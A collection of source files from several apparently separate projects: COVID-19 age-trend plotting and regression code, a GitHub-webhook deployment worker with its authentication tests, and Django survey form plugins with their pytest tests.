new_row['gap_in_day', 'Metric', 'Value'] = row.gap_in_day, new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
else:
pass
print('weekly metric computed')
return df
def compute_biweekly_metrics(df, metric):
"""Computes biweekly metrics (14 days) from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing biweekly one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Biweekly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_monday(df1)
L = [row for _, row in df1.iterrows()][1:]
for i in range((len(L) - 1) // 14):
value = sum([row.Value for row in L[14 * i: 14 * i + 14]])
for j in range(14 * i + 1, 14 * i + 15):
if j % 14 == 0:
row = L[j]
new_row = row.copy()
new_row['gap_in_day', 'Metric', 'Value'] = row.gap_in_day, new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
print('biweekly metric computed')
return df
def start_first_of_the_month(df):
"""Slices the dataset keeping data dated after the first available first day of the month
and before the last avaible first day of the month
Parameters:
-----------
df : Pandas DataFrame
the original dataset
Returns
-----------
df : Pandas DataFrame
the corresponding dataset
"""
first_date_gap = df.iloc[0].gap_in_day
try:
first_of_month_gap = min([i - 1 for i in firsts_of_the_month if i - 1 >= first_date_gap])
except:
return df
last_date_gap = df.iloc[-1].gap_in_day
try:
last_of_month_gap = min([i - 1 for i in firsts_of_the_month if i >= last_date_gap])
except:
return df
df = df[df['gap_in_day'] >= first_of_month_gap]
df = df[df['gap_in_day'] <= last_of_month_gap]
return df
def compute_monthly_metrics(df, metric):
"""Computes monthly metrics from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing monthly one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Monthly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_of_the_month(df1)
checkpoint = 0
L = [row for _, row in df1.iterrows()][1:]
try:
first_month_number = firsts_of_the_month.index(L[0].gap_in_day)
except IndexError:
continue
for i in range((len(L) - 1) // 30):
month_number = first_month_number + i
month_length = firsts_of_the_month[month_number + 1] - firsts_of_the_month[month_number]
value = sum([row.Value for row in L[checkpoint: checkpoint + month_length]])
checkpoint+= month_length
row = L[checkpoint-2]
new_row = row.copy()
new_row[
'gap_in_day',
'Date_code',
'Metric',
'Value'
] = row.gap_in_day, computeDatecodeFromGap(row.gap_in_day),new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
print('monthly metric computed')
return df
def build_time_metrics(df):
"""Builds time metrics from dataframe containing cumulative metrics
Parameters:
-----------
df : Pandas DataFrame
the original dataset (assumed to have one 'Metric' column (long format))
Returns
-----------
df : Pandas dataframe
the corresponding dataframe with the new metrics (long format)
"""
for metric in ['Deaths', 'Cases', 'Tests']:
df = compute_daily_metrics(df, metric)
df = compute_weekly_metrics(df, metric)
df = compute_biweekly_metrics(df, metric)
df = compute_monthly_metrics(df, metric)
return df
def regression(df, degree, forecast, by_pop):
"""Computes polynomal regressions on plotted data
Parameters:
-----------
df : Pandas DataFrame
the dataset, assumed to be have one 'Metric' column
degree: int
degree of the polynomial regression
forecast : int
the number of days to forecast
by_pop : bool
if true, consider values py millions inhabitants
else consider gross values
Returns:
-----------
regressons_list : (numpy array, numpy array) list
the list of the several modelizations got by regression
"""
if by_pop :
V = 'Value_by_pop'
else:
V = 'Value'
metrics = list(
set(
df['Metric'].values
)
)
regressions_list = []
for metric in metrics:
df0 = df[df['Metric'] == metric]
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
x = np.array(
df1['gap_in_day']
)
y = np.array(
df1[V]
)
X = x[:, np.newaxis]
model = make_pipeline(
PolynomialFeatures(degree),
Ridge()
)
model.fit(X, y)
x_plot = np.linspace(
min(x),
max(df1['gap_in_day']) + forecast,
1000
)
X_plot = x_plot[:, np.newaxis]
regressions_list.append(
(x_plot, model.predict(X_plot))
)
return regressions_list
def regression_histogram(df, degree):
"""Computes polynomal regressions on data of the histogram
Parameters:
-----------
df : Pandas DataFrame
the dataset, assumed to be have one 'Metric' column
degree: int
degree of the polynomial regression
Returns:
-----------
X, Y : numpy arrays
the model got by regression
"""
x = np.array(
df['Age']
)
y = np.array(
df['Value']
)
X = x[:, np.newaxis]
model = make_pipeline(
PolynomialFeatures(degree),
Ridge()
)
model.fit(X, y)
x_plot = np.linspace(
min(x),
max(x),
1000
)
X_plot = x_plot[:, np.newaxis]
X, Y = (x_plot + 5, model.predict(X_plot))
return X, Y
```
#### File: COVID19_Trends_by_Age/src/plots.py
```python
import pandas as pd
from math import isnan
import plotly.graph_objects as go
import plotly.express as px
from src.mysettings import label_dic, months_list, code_state, code_country, firsts_of_the_month
from src.helpers import select_data, regions_of_country, dfadaptDateRange,computeDateFormat, regression, computeDatecode, adaptDataframeHistogram, ageRange, regression_histogram
from src.preprocess import divide_US_Dataframe
def plot_metrics(df, countries_list, regions_list, ages_list, genders_list,
metrics, logvalue, start_date, end_date, rug_value,
reverse, trend, forecast, unit, table_option
):
"""Plotting several metrics (e.g cases, deaths or tests) depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
countries_list : str list
the list of the countries to select
regions_list : str list
the list of the region to select
ages_list : int list
the list of the age ranges to select
genders_list : str list
the list of the genders to select
metrics : str list
the metrics that we want to plot
logvalue : bool
activates logarithmic scale for y axis
start_date : str
the first date to be considered
end_date : str
the last date to be considered
rug_value : bool
activates the rug plot option
reverse : bool
activates the reverse axis option
trend : int
the degree of the polynom we want to modelize
forecast : int
the number of forcasted days to display
unit : str
unit used to divide data
table_option : bool
activates the table displaying option
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
if 'All' in regions_list and ('UK' in countries_list) :
# df0 = delete_multiple_sources(df, ages_list, genders_list)
df0 = df
else:
df0 = df
df0 = select_data(
df,
countries_list,
regions_list,
ages_list,
genders_list
)
df0 = dfadaptDateRange(df0, start_date, end_date)
df0 = df0[df0['Metric'].isin(metrics)]
df0[['Date_format', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Sex']].to_csv('data/download/data_download.csv')
if df0.empty:
fig = go.Figure(
go.Indicator(
title = {"text" : "No data available"}
)
)
fig.update_layout(paper_bgcolor = "rgba(188,188,188, 0.33)")
return fig
elif table_option:
fig = go.Figure(data=
[
go.Table(header = dict(
values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
fill_color = 'rgba(0,131,138,0.5)',
),
cells = dict(
values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
fill_color = 'white',
)
)
]
)
fig.update_layout(autosize=False,
width= 1425,
height=710,
)
return fig
else:
pass
if unit == 'Per million inhabitants' and regions_list == ['All']:
unit_tag = ' (Per million inhabitants)'
Y = df0['Value_by_pop']
else:
unit_tag = ''
Y = df0['Value']
if reverse:
X,Y = Y, df0['gap_in_day']
else:
X,Y = df0['gap_in_day'], Y
if regions_list == ['All']:
region_tag = ''
else:
region_tag = ' (Regions)'
fig = px.scatter(df0,
x = X,
y = Y,
log_y = logvalue,
opacity = 1 / (len(metrics) ** 0.2),
color = 'Country - Region - Age - Gender',
symbol = 'Metric',
symbol_sequence = ['circle', 'cross', 'x', 'star-triangle-up', 'star', 'diamond', 'hexagon'],
hover_name = 'Country - Region - Age - Gender',
labels = {
'Date_format' : 'Date',
'gap_in_day' : 'Date',
'Value_by_pop' : 'Value by M inhabitants'
},
hover_data = {
'gap_in_day' : True,
'Date' : False,
'Date_format' : True,
'Metric' : True,
'Value' : True,
'Country - Region - Age - Gender' : False,
},
title = 'COVID-19 : ' + ', '.join(metrics) + ' in '+ ', '.join(countries_list) + region_tag,
marginal_y = rug_value,
template = 'plotly_white',
)
fig.update_traces(marker = dict(
size = 8,
line = dict(
width = .25,
color ='grey'
)
),
selector = dict(mode = 'markers')
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710,
)
if reverse:
fig.update_yaxes(
tickvals = [i - 1 for i in firsts_of_the_month],
ticktext = [ i + ' 2020' for i in months_list],
tickwidth = 2,
tickcolor = 'grey',
ticklen = 10,
col = 1,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
x_axis = ', '.join(
[label_dic[i] for i in metrics]
) + unit_tag
fig.update_xaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = x_axis,
title_font = dict(size = 18),
)
else:
fig.update_xaxes(
tickvals = [i - 1 for i in firsts_of_the_month],
ticktext = [ i + ' 2020' for i in months_list],
tickwidth = 2,
tickcolor = 'grey',
ticklen = 10,
col = 1,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
y_axis = ', '.join(
[label_dic[i] for i in metrics]
) + unit_tag
fig.update_yaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = y_axis,
title_font = dict(size = 18),
)
if trend>0:
reg = regression(df0, trend, forecast, unit == 'Per million inhabitants')
for X, Y in reg:
if reverse:
Y, X = X, Y
else:
pass
fig.add_trace(
go.Scatter(
x = X,
y = Y,
mode = 'lines',
line = {
'color' : 'DarkSlateGrey',
'width' : 2
},
name = '',
showlegend = False
)
)
else:
pass
return fig
def plot_histogram(df, country, region, gender, metric,
logvalue, trend, table_option, end_date
):
"""Plotting histogram by age ranges depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
country : str
the selected_coutry
region : str
the selected region
gender : str
the selected gender
metric : list
the selected metric
logvalue : bool
activates logarithmic scale for y axis
trend : int
the degree of the polynom we want to modelize
table_option : bool
activates the table displaying option
end_date : int
gap_in_day value of the last date to consider
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
df0 = df.copy()
df0 = select_data(
df,
[country],
[region],
[i*10 for i in range(11)],
[gender]
)
df0 = df0[df0['Metric'] == metric]
df0 = adaptDataframeHistogram(df0, end_date)
if df0.empty:
fig = go.Figure(
go.Indicator(
title = {"text" : "No data available"}
)
)
fig.update_layout(paper_bgcolor = "rgba(188,188,188, 0.33)")
return fig
elif table_option:
fig = go.Figure(data=
[
go.Table(header = dict(
values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
fill_color = 'rgba(0,131,138,0.5)',
),
cells = dict(
values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
fill_color = 'white',
)
)
]
)
fig.update_layout(
autosize=False,
width= 1425,
height=710,
)
return fig
else:
if region == 'All':
region_tag = ''
else:
region_tag = region + ', '
df0['Age range'] = df0.apply(ageRange, axis = 1)
df0.sort_values(by = ['Date_code'], ascending=False)
fig = px.histogram(
df0,
x = 'Age',
y = 'Value',
category_orders = {
'Age': [10*i for i in range(11)],
},
color = 'Date_format',
template = 'simple_white',
log_y = logvalue,
title = 'COVID-19 : ' + metric + ' in ' + region_tag + country,
nbins = 11,
color_discrete_sequence=['rgba(0,131,138,0.87)', 'rgba(0,166,170,0.87)'],
labels = {
'Date_format' : 'Latest data : ',
},
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710,
)
fig.update_layout(hovermode = "x unified")
fig.update_traces(hovertemplate = None)
fig.update_xaxes(
tickvals = [10 * i + 5 for i in range(11)],
ticktext = [str(10 * i) + ' - ' + str(10 * i + 9)+ ' y.o' for i in range(10)]+['100 - 105 y.o'],
tickwidth = 0,
ticklen = 0,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
y_axis = ', '.join(
[label_dic[i] for i in [metric]]
)
fig.update_yaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = y_axis,
title_font = dict(size = 18),
)
if trend > 0:
X, Y = regression_histogram(df0, trend)
fig.add_trace(
go.Scatter(
x = X,
y = Y,
mode = 'lines',
line = {
'color' : 'DarkSlateGrey',
'width' : 2
},
name = '',
showlegend = False
)
)
return fig
def plot_usa_map(df, age, gender, metric, selected_unit, end_date):
"""Plotting choropleth map of the USA depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
age : int
the age range to select
gender : str
the genders to select
metric : str
the metric that we want to plot
selected_unit : str
the selected unit with which data is divided
end_date : str
the last date to be considered
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
States = regions_of_country(df,['USA'])
df0 = select_data(
df,
['USA'],
States,
[age],
[gender]
)
df0['Date_code'] = df0.apply(computeDatecode, axis = 1)
df0['Date_format'] = df0.apply(computeDateFormat, axis = 1)
df0 = df0.sort_values(by = ['Date_code'])
df0 = df0[df0['Metric'] == metric]
df0 = df0[df0['gap_in_day'] <= end_date]
values_list = []
dates_list = []
for state in States:
df1 = select_data(
df0,
['USA'],
[state],
[age],
[gender]
)
df1 = divide_US_Dataframe(df1, selected_unit)
if len(df1) == 0:
values_list.append('nan')
dates_list.append('nan')
else:
index = len(df1) - 1
value = list(df1['Value'])[index]
date = list(df1['Date_format'])[index]
while isnan(value) and index > 0:
index -= 1
value = list(df1['Value'])[index]
date = list(df1['Date_format'])[index]
values_list.append(value)
dates_list.append(date)
Code = [code_state[state] for state in States]
df2 = pd.DataFrame(
{'state' : States, 'code' : Code, 'Value' : values_list, 'Date' : dates_list}
)
for col in df2.columns:
df2[col] = df2[col].astype(str)
df2['text'] = df2['state'] + '<br>' + 'Value : ' + df2['Value'] + '<br>' + df2['Date'] + '<br>' + metric
fig = go.Figure(
data=go.Choropleth(
locations = df2['code'],
z = df2['Value'].astype(float),
locationmode = 'USA-states',
colorscale = 'Reds',
autocolorscale = False,
text = df2['text'],
marker_line_color = 'rgb(0, 131, 138)',
colorbar_title = metric,
hoverinfo = 'text',
)
)
if selected_unit == 'Per million inhabitants':
unit_tag = ' (Per million inhabitants)'
else:
unit_tag = ''
fig.update_layout(
title_text = 'Number of ' + metric + ' by state ' + 'for ' +
str(age) + ' - ' + str(age + 9) + ' year olds' + unit_tag,
geo = dict(
scope='usa',
projection = go.layout.geo.Projection(type = 'albers usa'),
showlakes = False,
lakecolor = 'rgb(255, 255, 255)'
),
),
fig.update_layout(
autosize=False,
width= 1425,
height=710
)
return fig
def plot_world_map(df, age, gender, metric, selected_unit, end_date):
"""Plotting choropleth world map depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
age : int
the age range to select
gender : str
the genders to select
metric : str
the metric that we want to plot
selected_unit : str
the selected unit with which data is divided
end_date : str
the last date to be considered
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
Countries = list(
set(
df['Country']
)
)
for country in ['England and Wales', 'England', 'Scotland', 'Northern Ireland', 'Senegal', 'Eswatini']: # England, Scotland, N. Ireland are already in UK country
try:
Countries.remove(country)
except ValueError:
pass
df0 = select_data(
df,
Countries,
['All'],
[age],
[gender]
)
df0['Date_code'] = df0.apply(computeDatecode, axis = 1)
df0 = df0.sort_values(by = ['Date_code'])
df0['Date_format'] = df0.apply(computeDateFormat, axis = 1)
df0 = df0[df0['Metric'] == metric]
df0 = df0[df0['gap_in_day'] <= end_date]
values_list = []
dates_list = []
for country in Countries:
df1 = select_data(
df0,
[country],
['All'],
[age],
[gender]
)
if selected_unit == 'Per million inhabitants':
column = 'Value_by_pop'
else:
column = 'Value'
if len(df1) == 0:
values_list.append('nan')
dates_list.append('nan')
else:
index = len(df1)-1
value = list(df1[column])[index]
date = list(df1['Date_format'])[index]
while isnan(value) and index > 0:
index -= 1
value = list(df1[column])[index]
date = list(df1['Date_format'])[index]
values_list.append(value)
dates_list.append(date)
Code = [code_country[country] for country in Countries]
df2 = pd.DataFrame(
{'Country' : Countries, 'code' : Code, 'Value' : values_list, 'Date' : dates_list}
)
for col in df2.columns:
df2[col] = df2[col].astype(str)
df2['text'] = df2['Country'] + '<br>' + 'Value : ' + df2['Value'] + '<br>' + df2['Date'] + '<br>' + metric
fig = go.Figure(
data = go.Choropleth(
locations = df2['code'],
z = df2['Value'],
hoverinfo = 'text',
text = df2['text'],
colorscale = 'Reds',
marker_line_color = 'rgb(0, 131, 138)',
colorbar_title = metric,
)
)
if selected_unit == 'Per million inhabitants':
unit_tag = ' (Per million inhabitants)'
else:
unit_tag = ''
fig.update_layout(
title_text = 'Number of ' + metric + ' by country ' + 'for ' +
str(age) + ' - ' + str(age + 9) + ' year olds' + unit_tag,
geo = dict(
showframe = False,
showcoastlines = True,
),
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710
)
return fig
def build_download_file(df, countries_list, regions_list, ages_list, genders_list,
metrics, start_date, end_date
):
if 'All' in regions_list and ('UK' in countries_list) :
# df0 = delete_multiple_sources(df, ages_list, genders_list)
df0 = df
else:
df0 = df
df0 = select_data(
df,
countries_list,
regions_list,
ages_list,
genders_list
)
df0 = dfadaptDateRange(df0, start_date, end_date)
df0 = df0[df0['Metric'].isin(metrics)]
df0 = df0[['Date_format', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Sex']]
print(df0.head())
# elif table_option:
# fig = go.Figure(data=
# [
# go.Table(header = dict(
# values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
# fill_color = 'rgba(0,131,138,0.5)',
# ),
# cells = dict(
# values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
# fill_color = 'white',
# )
# )
# ]
# )
# fig.update_layout(autosize=False,
# width= 1425,
# height=710,
# )
return None
```
|
{
"source": "jeancochrane/bunny-hook",
"score": 2
}
|
#### File: bunny-hook/api/worker.py
```python
import os
import subprocess
import logging
import sys
import shutil
import yaml
from api.exceptions import WorkerException
from api.payload import Payload
# Log to stdout
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
class Worker(object):
'''
Perform a build based on a GitHub API payload.
'''
def __init__(self, payload):
'''
Initialize the Worker with attributes from the payload that are
necessary for cloning the repo.
'''
self.payload = Payload(payload)
self.repo_name = self.payload.get_name()
self.origin = self.payload.get_origin()
self.branch = self.payload.get_branch()
def run_command(self, cmd):
'''
Helper method that wraps `subprocess.run` to run commands and fail noisily.
'''
try:
return subprocess.run(cmd, check=True, universal_newlines=True)
except subprocess.CalledProcessError as e:
raise WorkerException(str(e))
def run_script(self, script_path):
'''
Run a shell script from a file.
This should probably have some more sophisticated permissioning (e.g.
chrooting) before going live.
'''
# Make script executable -- Python chmod docs:
# https://docs.python.org/3/library/stat.html#stat.S_IXOTH
os.chmod(script_path, 0o775)
return self.run_command(['bash', script_path])
def deploy(self, tmp_path=None):
'''
Run build and deployment based on the config file.
'''
logging.info('Deploying %s' % self.repo_name)
if not tmp_path:
# Default to /tmp/<repo-name>
tmp_path = os.path.abspath(os.path.join(os.sep, 'tmp', self.repo_name))
# If the repo exists already in the tmp path, remove it
if os.path.exists(tmp_path):
logging.info('Updating work in %s...' % tmp_path)
self.run_command(['git', '-C', tmp_path, 'fetch', '--depth=1', 'origin', self.branch])
self.run_command(['git', '-C', tmp_path, 'checkout', self.branch])
self.run_command(['git', '-C', tmp_path, 'reset', '--hard', self.branch])
else:
logging.info('Cloning {origin} into {tmp_path}...'.format(origin=self.origin,
tmp_path=tmp_path))
self.run_command(['git', 'clone', '--depth=1', '--branch', self.branch, self.origin, tmp_path])
self.run_command(['git', '-C', tmp_path, 'checkout', self.branch])
# Check for a yaml file
yml_file = os.path.join(tmp_path, 'deploy.yml')
yaml_file = os.path.join(tmp_path, 'deploy.yaml')
if not (os.path.isfile(yml_file) or os.path.isfile(yaml_file)):
raise WorkerException('Could not locate a `deploy.yml` file in your repo.')
if os.path.isfile(yml_file) and os.path.isfile(yaml_file):
raise WorkerException('Found two config files in this repo! Delete one and try again.')
if os.path.isfile(yml_file):
config_file = yml_file
else:
config_file = yaml_file
# Parse the config file
logging.info('Loading config file from %s...' % config_file)
with open(config_file) as cf:
config = yaml.load(cf)
if not config:
raise WorkerException('Deployment file %s appears to be empty' % config_file)
clone_path = config.get('home')
prebuild_scripts = config.get('prebuild', [])
build_scripts = config.get('build', [])
deploy_scripts = config.get('deploy', [])
# Enforce required directives
if not clone_path:
raise WorkerException('Deployment file %s is missing `home` directive' % config_file)
# Move repo from tmp to the clone path
logging.info('Moving repo from {tmp_path} to {clone_path}...'.format(tmp_path=tmp_path,
clone_path=clone_path))
self.run_command(['rsync', '-avz', '--delete', tmp_path, clone_path])
# Run prebuild scripts, if they exist
for script in prebuild_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running prebuild script %s...' % script_path)
self.run_script(script_path)
# Run build scripts, if they exist
for script in build_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running build script %s...' % script_path)
self.run_script(script_path)
# Run deploy scripts, if they exist
for script in deploy_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running deployment script %s...' % script_path)
self.run_script(script_path)
logging.info('Finished deploying %s!' % self.repo_name)
logging.info('---------------------')
return True
```
#### File: bunny-hook/tests/test_app.py
```python
from unittest import TestCase
from contextlib import contextmanager
import json
from flask import appcontext_pushed, g
from werkzeug.datastructures import Headers
import env
import api
from api.routes import get_hmac
from test_secrets import TOKENS
class TestAPI(TestCase):
@classmethod
def setUpClass(cls):
'''
Set up some class-wide attributes for testing.
'''
api.app.testing = True
cls.app = api.app.test_client()
cls.tokens = TOKENS
# Good and bad authentication credentials
cls.good_sig = get_hmac(cls.tokens[0])
cls.bad_sig = get_hmac('bogus token')
@contextmanager
def authenticate(self):
'''
Inject fake security tokens into the app context for testing.
'''
def handler(sender, **kwargs):
g.tokens = self.tokens
with appcontext_pushed.connected_to(handler, api.app):
yield
def test_successful_request(self):
'''
Test a successful request.
'''
post_data = json.dumps({
'ref': 'refs/head/master',
'repository': {
'name': 'test-repo'
}
})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/master',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 202)
response = json.loads(post_request.data.decode('utf-8'))
expected = 'Build started for ref refs/head/master of repo test-repo'
self.assertEqual(response.get('status'), expected)
def test_authentication_failed(self):
'''
Test a bad request where the secret token doesn't authenticate.
'''
post_data = json.dumps({
'ref': 'refs/head/master',
'repository': {
'name': 'test-repo'
}
})
headers = Headers()
headers.add('X-Hub-Signature', self.bad_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/master',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 401)
response = json.loads(post_request.data.decode('utf-8'))
expected = 'Request signature failed to authenticate'
self.assertEqual(response.get('status'), expected)
def test_incorrect_branch_name(self):
'''
When the ref path from GitHub is different from the hook branch name,
make sure that the app does nothing.
'''
post_data = json.dumps({'ref': 'refs/heads/master'})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/deploy',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 400)
response = json.loads(post_request.data.decode('utf-8'))
msg = 'Skipping build for unregistered branch "refs/heads/master"'
self.assertEqual(response.get('status'), msg)
def test_no_ref(self):
'''
Test a bad request (does not contain the `ref` attribute).
'''
post_data = json.dumps({'test': 'test'})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/deploy',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 400)
response = json.loads(post_request.data.decode('utf-8'))
expected = "Malformed request payload: {'test': 'test'}"
self.assertEqual(response.get('status'), expected)
```
|
{
"source": "jeancochrane/just-spaces",
"score": 2
}
|
#### File: intercept/income/fobi_form_elements.py
```python
from django import forms
from fobi.base import FormFieldPlugin, form_element_plugin_registry
from ..forms import INCOME_CHOICES
from .forms import IncomeForm
class IncomePlugin(FormFieldPlugin):
"""IncomePlugin."""
uid = "income"
name = "What income group does your household fall under?"
form = IncomeForm
group = "Intercept" # Group to which the plugin belongs to
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
field_kwargs = {
'required': self.data.required,
'label': self.data.label,
'widget': forms.widgets.Select(attrs={}),
'choices': INCOME_CHOICES,
}
return [(self.data.name, forms.ChoiceField, field_kwargs)]
form_element_plugin_registry.register(IncomePlugin)
```
#### File: observational/age_observational/fobi_form_elements.py
```python
import sys
from fobi.base import FormFieldPlugin, form_element_plugin_registry
from pldp.forms import AGE_BASIC_CHOICES, AGE_DETAILED_CHOICES, \
AGE_COMPLEX_CHOICES
from ..widgets import ObservationalWidget
from ..fields import ObservationalField
from .forms import AgeObservationalForm
class AgeObservationalPlugin(FormFieldPlugin):
"""AgeObservationalPlugin."""
uid = "age_observational"
name = "Age"
form = AgeObservationalForm
group = "Observational" # Group to which the plugin belongs to
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
choice_level = 'AGE_{}_CHOICES'.format(self.data.detail_level.upper())
choices = getattr(sys.modules[__name__], choice_level)
field_kwargs = {
'required': self.data.required,
'label': self.data.label,
'choices': choices,
'widget': ObservationalWidget(choices=choices)
}
return [(self.data.name, ObservationalField, field_kwargs)]
form_element_plugin_registry.register(AgeObservationalPlugin)
```
#### File: just-spaces/tests/test_dad.py
```python
import pytest
from django.urls import reverse
from surveys import models
@pytest.fixture
def survey_submitted_setup(survey, survey_row, survey_component):
# Set up necessary fixtures for the surveys-submitted-detail view
pass
def create_formset_data(initial, total, forms):
# Helper function to create POST data for a formset in the DAD.
# Arguments:
# * initial (int): Initial number of forms on the page at load time
# * total (int): Total number of forms on the page at POST time
# * forms (iterable): Iterable of dictionaries, each one representing the
# field value for a form in the formset
output_form = {
# Initialize with management form data
'form-INITIAL_FORMS': initial,
'form-TOTAL_FORMS': total,
}
for idx, form in enumerate(forms):
prefix = 'form-' + str(idx) + '-'
for field_name, value in form.items():
output_form[prefix + field_name] = value
return output_form
def test_create_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD can create a chart
chart_data = [{'short_description': '__foobar__', 'order': 1}]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
assert chart_data[0]['short_description'] in create_response.content.decode('utf-8')
new_chart = models.SurveyChart.objects.get(id=1)
assert new_chart.short_description == chart_data[0]['short_description']
def test_basic_chart_display(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD displays charts in the correct number and order
chart_data = [
{'short_description': '__bar__', 'order': 2},
{'short_description': '__foo__', 'order': 1},
{'short_description': '__baz__', 'order': 3}
]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
# Make sure the charts are displayed in the correct order
sorted_charts = sorted(chart_data, key=lambda chart: chart['order'])
for idx, form in enumerate(sorted_charts):
assert form['short_description'] in create_response.content.decode('utf-8')
if idx == len(sorted_charts)-1:
prev_desc = sorted_charts[idx-1]['short_description']
assert prev_desc in create_response.content.decode('utf-8').split(form['short_description'])[0]
else:
next_desc = sorted_charts[idx+1]['short_description']
assert next_desc in create_response.content.decode('utf-8').split(form['short_description'])[1]
def test_delete_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD can delete a chart
chart_data = {
'short_description': '__delete_me__',
'order': 1,
'form_entry': survey_form_entry
}
new_chart = models.SurveyChart.objects.create(**chart_data)
url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
get_response = client.get(url)
assert get_response.status_code == 200
assert chart_data['short_description'] in get_response.content.decode('utf-8')
forms_to_delete = [chart_data.copy()]
forms_to_delete[0].update({'id': new_chart.id, 'DELETE': True})
post_data = create_formset_data(1, len(forms_to_delete), forms_to_delete)
delete_response = client.post(url, data=post_data)
assert delete_response.status_code == 200
assert 'alert-success' in delete_response.content.decode('utf-8')
assert chart_data['short_description'] not in delete_response.content.decode('utf-8')
def test_ignore_new_removed_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD will not create a new chart if the 'delete' field is checked
chart_data = [{'short_description': '__delete_me__', 'order': 1, 'DELETE': True}]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
assert chart_data[0]['short_description'] not in create_response.content.decode('utf-8')
```
#### File: just-spaces/tests/test_views.py
```python
import pytest
from django.urls import reverse
from pldp.forms import AGE_COMPLEX_CHOICES
@pytest.mark.django_db
def test_survey_list_edit(client, user, survey_form_entry, survey_form_entry_observational):
client.force_login(user)
url = reverse('surveys-list-edit')
response = client.get(url)
surveys = response.context['surveys']
assert response.status_code == 200
assert len(surveys) == 1
@pytest.mark.django_db
def test_survey_list_run(client, user, survey_form_entry, survey_form_entry_observational):
client.force_login(user)
url = reverse('surveys-list-run')
response = client.get(url)
surveys = response.context['surveys']
assert response.status_code == 200
assert len(surveys) == 1
@pytest.mark.django_db
def test_survey_edit_intercept(client, user, survey_form_entry):
client.force_login(user)
url = reverse('fobi.edit_form_entry', kwargs={'form_entry_id': survey_form_entry.id})
response = client.get(url)
plugins = response.context['user_form_element_plugins']
intercept_presets = [('age_intercept', 'How old are you?'),
